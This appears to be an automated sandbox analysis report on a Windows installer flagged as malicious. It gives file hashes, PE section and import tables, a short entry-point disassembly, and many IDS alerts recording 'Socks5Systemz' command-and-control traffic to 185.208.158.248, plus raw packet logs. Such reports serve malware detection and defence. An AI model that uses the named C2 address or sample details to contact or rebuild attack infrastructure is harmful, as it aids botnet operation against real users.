                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23312
                                                          Entropy (8bit):4.596242908851566
                                                          Encrypted:false
                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\eCh9R4T214.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):709120
                                                          Entropy (8bit):6.498750714093575
                                                          Encrypted:false
                                                          SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                          MD5:16C9D19AB32C18671706CEFEE19B6949
                                                          SHA1:FCA23338CB77068E1937DF4E59D9C963C5548CF8
                                                          SHA-256:C1769524411682D5A204C8A40F983123C67EFEADB721160E42D7BBFE4531EB70
                                                          SHA-512:32B4B0B2FB56A299046EC26FB41569491E8B0CD2F8BEC9D57EC0D1AD1A7860EEC72044DAB2D5044CB452ED46E9F21513EAB2171BAFA9087AF6D2DE296455C64B
                                                          Malicious:true
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.99857870252986
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                          • Inno Setup installer (109748/4) 1.08%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          File name:eCh9R4T214.exe
                                                          File size:4'405'400 bytes
                                                          MD5:faefae3ea2db457031eb3f72ab6fedf5
                                                          SHA1:7f5be1428e1d3a448f59fbf0137b635723e6d8b1
                                                          SHA256:e0e8ba8972785e5f8c0e1dc0d67fd3135cea8ad382c9d8e303b0a3bac50b8e8b
                                                          SHA512:ea7c425b0b1723c5c56c734e8831c7627e15ec22e51ff942c792f810af2907de9240beb32f9223e0f974113f019c06e5b82e93c7c8d55b52f070a811e2b3000c
                                                          SSDEEP:98304:NduMI5nUZwHhKfIVkWoULw2XD5hkEUnq5EDDoVxKod/:6MqUZghKA6aU8aDggoR
                                                          TLSH:1D1633542664A27FDAD9F07D1EC6C18CB55A380246E8601D3EAE9DB93F1F474382F3A4
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                          Icon Hash:2d2e3797b32b2b99
                                                          Entrypoint:0x409c40
                                                          Entrypoint Section:CODE
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:1
                                                          OS Version Minor:0
                                                          File Version Major:1
                                                          File Version Minor:0
                                                          Subsystem Version Major:1
                                                          Subsystem Version Minor:0
                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFC4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor eax, eax
                                                          mov dword ptr [ebp-10h], eax
                                                          mov dword ptr [ebp-24h], eax
                                                          call 00007F974CADB11Bh
                                                          call 00007F974CADC322h
                                                          call 00007F974CADC5B1h
                                                          call 00007F974CADE5E8h
                                                          call 00007F974CADE62Fh
                                                          call 00007F974CAE0F5Eh
                                                          call 00007F974CAE10C5h
                                                          xor eax, eax
                                                          push ebp
                                                          push 0040A2FCh
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          xor edx, edx
                                                          push ebp
                                                          push 0040A2C5h
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          mov eax, dword ptr [0040C014h]
                                                          call 00007F974CAE1B2Bh
                                                          call 00007F974CAE175Eh
                                                          lea edx, dword ptr [ebp-10h]
                                                          xor eax, eax
                                                          call 00007F974CADEC18h
                                                          mov edx, dword ptr [ebp-10h]
                                                          mov eax, 0040CE24h
                                                          call 00007F974CADB1C7h
                                                          push 00000002h
                                                          push 00000000h
                                                          push 00000001h
                                                          mov ecx, dword ptr [0040CE24h]
                                                          mov dl, 01h
                                                          mov eax, 0040738Ch
                                                          call 00007F974CADF4A7h
                                                          mov dword ptr [0040CE28h], eax
                                                          xor edx, edx
                                                          push ebp
                                                          push 0040A27Dh
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          call 00007F974CAE1B9Bh
                                                          mov dword ptr [0040CE30h], eax
                                                          mov eax, dword ptr [0040CE30h]
                                                          cmp dword ptr [eax+0Ch], 01h
                                                          jne 00007F974CAE1CDAh
                                                          mov eax, dword ptr [0040CE30h]
                                                          mov edx, 00000028h
                                                          call 00007F974CADF8A8h
                                                          mov edx, dword ptr [00000030h]
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                          .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                          .rsrc0x110000x2c000x2c00913fb35680e0f9a83b69fe9b891e9e62False0.32279829545454547data4.461639953912962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                          RT_STRING0x12e440x68data0.75
                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                          RT_RCDATA0x130100x2cdata1.2045454545454546
                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                          RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                          RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                          DLLImport
                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                          user32.dllMessageBoxA
                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                          comctl32.dllInitCommonControls
                                                          advapi32.dllAdjustTokenPrivileges
                                                          Language of compilation systemCountry where language is spokenMap
                                                          DutchNetherlands
                                                          EnglishUnited States
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-05T14:46:04.160167+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661580185.208.158.24880TCP
                                                          2024-10-05T14:46:05.038767+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661581185.208.158.24880TCP
                                                          2024-10-05T14:46:05.888736+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661582185.208.158.24880TCP
                                                          2024-10-05T14:46:06.703223+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661583185.208.158.24880TCP
                                                          2024-10-05T14:46:07.534444+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661584185.208.158.24880TCP
                                                          2024-10-05T14:46:08.356222+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661585185.208.158.24880TCP
                                                          2024-10-05T14:46:09.201934+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661586185.208.158.24880TCP
                                                          2024-10-05T14:46:10.010785+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661587185.208.158.24880TCP
                                                          2024-10-05T14:46:10.360667+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661587185.208.158.24880TCP
                                                          2024-10-05T14:46:11.177761+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661588185.208.158.24880TCP
                                                          2024-10-05T14:46:11.978001+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661589185.208.158.24880TCP
                                                          2024-10-05T14:46:12.331109+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661589185.208.158.24880TCP
                                                          2024-10-05T14:46:13.145967+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661590185.208.158.24880TCP
                                                          2024-10-05T14:46:13.968198+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661591185.208.158.24880TCP
                                                          2024-10-05T14:46:14.781720+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661593185.208.158.24880TCP
                                                          2024-10-05T14:46:15.799749+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661594185.208.158.24880TCP
                                                          2024-10-05T14:46:16.615648+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661595185.208.158.24880TCP
                                                          2024-10-05T14:46:17.423643+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661596185.208.158.24880TCP
                                                          2024-10-05T14:46:18.274069+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661597185.208.158.24880TCP
                                                          2024-10-05T14:46:18.636320+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661597185.208.158.24880TCP
                                                          2024-10-05T14:46:18.986658+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661597185.208.158.24880TCP
                                                          2024-10-05T14:46:19.806085+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661598185.208.158.24880TCP
                                                          2024-10-05T14:46:20.161675+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661598185.208.158.24880TCP
                                                          2024-10-05T14:46:20.973032+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661599185.208.158.24880TCP
                                                          2024-10-05T14:46:21.965522+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661600185.208.158.24880TCP
                                                          2024-10-05T14:46:22.315201+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661600185.208.158.24880TCP
                                                          2024-10-05T14:46:23.129284+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661601185.208.158.24880TCP
                                                          2024-10-05T14:46:23.941441+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661602185.208.158.24880TCP
                                                          2024-10-05T14:46:24.755828+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661603185.208.158.24880TCP
                                                          2024-10-05T14:46:25.596474+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661604185.208.158.24880TCP
                                                          2024-10-05T14:46:26.421087+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661605185.208.158.24880TCP
                                                          2024-10-05T14:46:27.257482+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661606185.208.158.24880TCP
                                                          2024-10-05T14:46:28.060044+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661607185.208.158.24880TCP
                                                          2024-10-05T14:46:28.899508+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661608185.208.158.24880TCP
                                                          2024-10-05T14:46:29.801366+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661609185.208.158.24880TCP
                                                          2024-10-05T14:46:30.608747+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661610185.208.158.24880TCP
                                                          2024-10-05T14:46:31.421889+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661611185.208.158.24880TCP
                                                          2024-10-05T14:46:32.272445+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661612185.208.158.24880TCP
                                                          2024-10-05T14:46:33.082963+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661613185.208.158.24880TCP
                                                          2024-10-05T14:46:34.103766+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661614185.208.158.24880TCP
                                                          2024-10-05T14:46:34.457190+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661614185.208.158.24880TCP
                                                          2024-10-05T14:46:35.318254+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661615185.208.158.24880TCP
                                                          2024-10-05T14:46:36.130968+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661616185.208.158.24880TCP
                                                          2024-10-05T14:46:36.935118+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661617185.208.158.24880TCP
                                                          2024-10-05T14:46:37.792518+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661618185.208.158.24880TCP
                                                          2024-10-05T14:46:38.151611+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661618185.208.158.24880TCP
                                                          2024-10-05T14:46:38.514866+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661618185.208.158.24880TCP
                                                          2024-10-05T14:46:39.361337+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661620185.208.158.24880TCP
                                                          2024-10-05T14:46:40.192534+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661621185.208.158.24880TCP
                                                          2024-10-05T14:46:41.015282+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661622185.208.158.24880TCP
                                                          2024-10-05T14:46:41.857430+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661623185.208.158.24880TCP
                                                          2024-10-05T14:46:42.672734+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661624185.208.158.24880TCP
                                                          2024-10-05T14:46:43.490982+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661625185.208.158.24880TCP
                                                          2024-10-05T14:46:44.300816+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661626185.208.158.24880TCP
                                                          2024-10-05T14:46:45.406695+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661627185.208.158.24880TCP
                                                          2024-10-05T14:46:46.788860+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661628185.208.158.24880TCP
                                                          2024-10-05T14:46:47.605807+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661629185.208.158.24880TCP
                                                          2024-10-05T14:46:48.446477+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661630185.208.158.24880TCP
                                                          2024-10-05T14:46:48.802019+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661630185.208.158.24880TCP
                                                          2024-10-05T14:46:49.633897+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661631185.208.158.24880TCP
                                                          2024-10-05T14:46:50.587660+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661632185.208.158.24880TCP
                                                          2024-10-05T14:46:50.936577+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661632185.208.158.24880TCP
                                                          2024-10-05T14:46:51.752824+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661633185.208.158.24880TCP
                                                          2024-10-05T14:46:52.576930+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661634185.208.158.24880TCP
                                                          2024-10-05T14:46:53.452511+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661635185.208.158.24880TCP
                                                          2024-10-05T14:46:54.276514+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661636185.208.158.24880TCP
                                                          2024-10-05T14:46:55.100652+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661637185.208.158.24880TCP
                                                          2024-10-05T14:46:56.010978+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661638185.208.158.24880TCP
                                                          2024-10-05T14:46:57.245773+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661638185.208.158.24880TCP
                                                          2024-10-05T14:46:57.598414+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661638185.208.158.24880TCP
                                                          2024-10-05T14:46:58.433700+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661639185.208.158.24880TCP
                                                          2024-10-05T14:46:59.289125+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661640185.208.158.24880TCP
                                                          2024-10-05T14:47:00.090448+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661641185.208.158.24880TCP
                                                          2024-10-05T14:47:00.898093+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661642185.208.158.24880TCP
                                                          2024-10-05T14:47:01.714241+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661643185.208.158.24880TCP
                                                          2024-10-05T14:47:02.061777+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661643185.208.158.24880TCP
                                                          2024-10-05T14:47:02.875909+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661644185.208.158.24880TCP
                                                          2024-10-05T14:47:03.716529+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661645185.208.158.24880TCP
                                                          2024-10-05T14:47:04.542737+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661646185.208.158.24880TCP
                                                          2024-10-05T14:47:05.351360+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661647185.208.158.24880TCP
                                                          2024-10-05T14:47:06.172761+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661648185.208.158.24880TCP
                                                          2024-10-05T14:47:06.982940+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661649185.208.158.24880TCP
                                                          2024-10-05T14:47:07.806832+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661650185.208.158.24880TCP
                                                          2024-10-05T14:47:08.631956+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661652185.208.158.24880TCP
                                                          2024-10-05T14:47:09.453121+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661653185.208.158.24880TCP
                                                          2024-10-05T14:47:10.269795+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661654185.208.158.24880TCP
                                                          2024-10-05T14:47:11.115553+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661655185.208.158.24880TCP
                                                          2024-10-05T14:47:11.926229+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661656185.208.158.24880TCP
                                                          2024-10-05T14:47:12.943570+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.661657185.208.158.24880TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 5, 2024 14:46:03.464222908 CEST6158080192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:03.469182968 CEST8061580185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:03.469337940 CEST6158080192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:03.470134020 CEST6158080192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:03.474961042 CEST8061580185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:04.160087109 CEST8061580185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:04.160166979 CEST6158080192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:04.277153969 CEST6158080192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:04.277436972 CEST6158180192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:04.282337904 CEST8061580185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:04.282350063 CEST8061581185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:04.282402992 CEST6158080192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:04.282459021 CEST6158180192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:04.282664061 CEST6158180192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:04.287456989 CEST8061581185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:05.038680077 CEST8061581185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:05.038767099 CEST6158180192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:05.152282953 CEST6158180192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:05.152645111 CEST6158280192.168.2.6185.208.158.248
                                                          Oct 5, 2024 14:46:05.157669067 CEST8061582185.208.158.248192.168.2.6
                                                          Oct 5, 2024 14:46:05.157771111 CEST8061581185.208.158.248192.168.2.6
